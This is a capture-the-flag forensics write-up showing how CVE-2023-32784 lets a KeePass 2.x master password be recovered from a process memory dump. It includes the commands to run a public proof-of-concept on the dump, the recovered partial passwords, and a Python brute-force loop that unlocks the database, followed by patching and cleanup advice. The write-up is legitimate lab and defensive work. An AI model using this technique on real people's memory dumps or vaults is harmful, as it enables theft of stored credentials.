Unlocked - Writeup

Challenge Information

• Category: Forensics
• Files: Database.kdbx, KeePass.DMP (272MB)
• Vulnerability: CVE-2023-32784

Overview

Exploit CVE-2023-32784: Critical KeePass 2.X vulnerability allowing master password extraction from memory dumps.

Understanding CVE-2023-32784

The Vulnerability

KeePass uses custom SecureTextBoxEx for password entry:

• For every character typed, leftover string created in memory
• .NET memory management can't easily remove these
• Typing "Password" creates: ●a, ●●s, ●●●s, ●●●●w, ●●●●●o, ●●●●●●r, ●●●●●●●d
• First character lost, but all others recoverable!

Impact

• Works on process dumps, swap, hibernation, crash dumps, RAM dumps
• Works regardless of workspace lock
• No code execution required
• Can work after KeePass closed (reliability decreases)

Exploitation

Step 1: Extract Password Pattern

git clone https://github.com/CMEPW/keepass-dump-masterkey.git
python3 keepass-dump-masterkey/poc.py KeePass.DMP

Output:

Possible password: ●y_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
Possible password: ●'_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
...
Possible password: ●&_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce

Analysis:

• First character: Unknown (●)
• Second character: 10 candidates (y, ', e, \, {, , C, (, S, &)
• Remaining: _super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
• Note: Typo "confidental" → "confidential"

Step 2: Bruteforce First Two Characters

from pykeepass import PyKeePass
import string

suffix = "_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce"
second_chars = ['y', "'", 'e', '\\', '{', ' ', 'C', '(', 'S', '&']
first_chars = string.printable.strip()

for first in first_chars:
    for second in second_chars:
        password = first + second + suffix
        try:
            kp = PyKeePass('Database.kdbx', password=password)
            print(f"SUCCESS! Password: {password}")
        except:
            pass

Total: 94 × 10 = 940 attempts

Step 3: Database Unlocked!

Password found after ~200 attempts:

my_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce

Step 4: Extract Flag

Flag

BPCTF{r3memb3r_2_upgr4de_k33pa5s_7o_v3rsion_2.54}

Reminder: Upgrade to KeePass 2.54+ which fixes this vulnerability!

Key Takeaways

Vulnerability Details

1. Affects KeePass 2.X before 2.54
2. Caused by .NET memory management
3. Only first character lost, rest recoverable
4. Works on various memory artifacts
5. Locking workspace doesn't prevent attack

Defense

• Update KeePass to 2.54+ immediately
• Change master password if used affected version
• Clean memory artifacts:
  • Delete crash dumps
  • Delete hibernation file (hiberfil.sys)
  • Delete pagefile/swapfile
  • Overwrite deleted data
  • Restart computer

Affected vs Not Affected

Affected: KeePass 2.X (< 2.54) written in .NET

Not Affected:

• KeePass 2.54+
• KeePass 1.X
• KeePassXC
• Other non-.NET implementations

Tools

1. Python PoC
2. PyKeePass - Database access
3. Original C# PoC

Timeline

• May 2023: CVE discovered
• June 2023: KeePass 2.54 released with fix
• October 2025: This CTF challenge